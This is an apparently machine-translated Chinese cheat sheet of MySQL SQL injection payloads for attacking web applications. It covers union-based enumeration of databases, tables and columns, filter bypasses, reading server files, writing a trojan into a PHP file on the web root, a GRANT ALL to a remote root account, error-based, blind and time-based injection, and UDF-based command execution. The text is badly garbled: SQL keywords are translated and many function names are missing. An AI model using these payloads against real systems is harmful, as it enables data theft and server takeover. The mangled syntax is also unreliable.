0x00 mysql通用注入() 1.注释字符

/*

--

2. 过滤空间注入

使用 /**/ 或 () 或 + 代替空格

= 换页，新页面

%09 = 制表符

%0d=

%0a = 换行，新行

3.多种数据显示

()

()

()

4.相关功能

() 系统用户名

user() 用户名

当前用户名

()连接数据库的用户名

（） 数据库名称

()MYSQL数据库版本

()MYSQL函数读取本地文件

@@读取数据库路径

@@MYSQL安装路径

@@操作系统2003

将 *.* 上的所有内容授予 'root'@'%' BY '' WITH GRANT ；

5.mysql通用注入语句

猜猜字段数量

按 n/* 排序

查看mysql基本信息

和 1=2 联合 1,2,3,(char(32,58,32),0x7c,user(),(),()),5,6,7/*

查询数据库

和 1=2 并集 1,,3,4 来自 。 限制 1,1/*

和 1=2 并集 1,(),3,4 来自 ./*

查询表名

和 1=2 并集 1,2,3,4,,5 来自 。 其中=数据库限制的十六进制编码1,1/*

和 1=2 并集 1,2,3,4,(),5 来自 。 其中=数据库的十六进制编码/*

查询字段

和 1=2 并集 1,2,3,4,,5,6,7 来自 。 其中=表名的十六进制编码和=数据库限制的十六进制编码1,1/*

和 1=2 并集 1,2,3,4,(),5,6,7 来自 。 其中=表名的十六进制编码和=数据库的十六进制编码/*

查询数据

和 1=2 联合 1,2,3,字段 1,5,字段 2,7,8 来自.table/*

判断是否有读写权限

和 (count(*) from mysql.user)>0/*

和 (count() from mysql.user)>0/*

6.mysql读写文件

先决条件：

读取：需要文件权限

写法：1.绝对路径2.使用union 3.可以使用''

- - - - - - - - - - - - -读 - - - - - - - - - - -

.x读取方法

表a（cmd文本）；

将数据'c:\\xxx\\xxx\\xxx.txt'加载到表a中；

*来自一个；

.x读取方法

除了上面的方法之外，还可以使用()

表a（cmd文本）；

进入 a(cmd) (('c:\\ddd\\ddd\\ddd.txt'));

*来自一个；

.x读取方法

以上两种情况都是可以的

读取文件提示：

(字符(32,26,56,66))

(6E69)

- - - - - - 写 - - - - - - - - - - - - -

写入文件

union 1,2,3,char（这里写上你转换成十进制或十六进制的木马代码），5,6,7,8,9,10,7到'd:\web\. php'/*

将 1,2,3,('d:\web\.jpg'),5,6,7,8,9,10,7 合并为 'd:\web\.php'/*

0x01 mysql通用注入(,)

MySQL一般请求不支持多语句执行，但可以。

注入较多时使用错误注入！

1、如果能直接插入，管理员就可以直接使用！

进入 user(,) ('xxxx','xxxx'),('dddd','dddd')/* ');

2. 如果可以插入一些数据，则该数据将显示在网页上。 我们可以将xxs和csrf结合起来得到或者

注入与上面相同

0x02 mysql错误注入1. and( 1 from( count(*),(( (()) from . limit 0,1),floor(rand(0)*2))x from . group by x)a) 1=1

在语句处填写一般性句子，如： (0x7e,0x27,,0x27,0x7e) FROM 。 限制 0,1

2. and+1=(+*+from+(+((语句),1),((语句),1))+as+x)--

3. 设置主机='#39; 其中 id =1 aNd ( 1 FROM ( count(*),(floor(rand(0)*2),(((()),1,62)))a from .group by a)b);

4. 进入 (host) (( (1) from mysql.user where 1=1 aNd ( 1 FROM ( count(*),(floor(rand(0)*2),((( (语句)),1, 62)))a 来自 . 由 a)b))) 组成的组；

0x03 MySQL通用盲注使用ascii

AND ascii((( 来自 id=1 的用户),1,1))=49

使用正则表达式

和 1=( 1 FROM .WHERE ="" AND '^[an]' LIMIT 0,1)

0x04 mysql时间盲注1170 union if((,1,1)=char(11),(,('msg','by 5')),null) from ( () as ) as tbl

UNION IF((,1,1)='a',(,SHA1(1)),0) 用户，来自 mysql.user WHERE User = 'root'

0x05 其他mysql注入技巧稍后更新

0x06 mysql 数据库版本功能 1..0 或更高版本。 图书馆出现

2、.1之后，将udf导入到xx\lib\\目录下

3..x稍后执行命令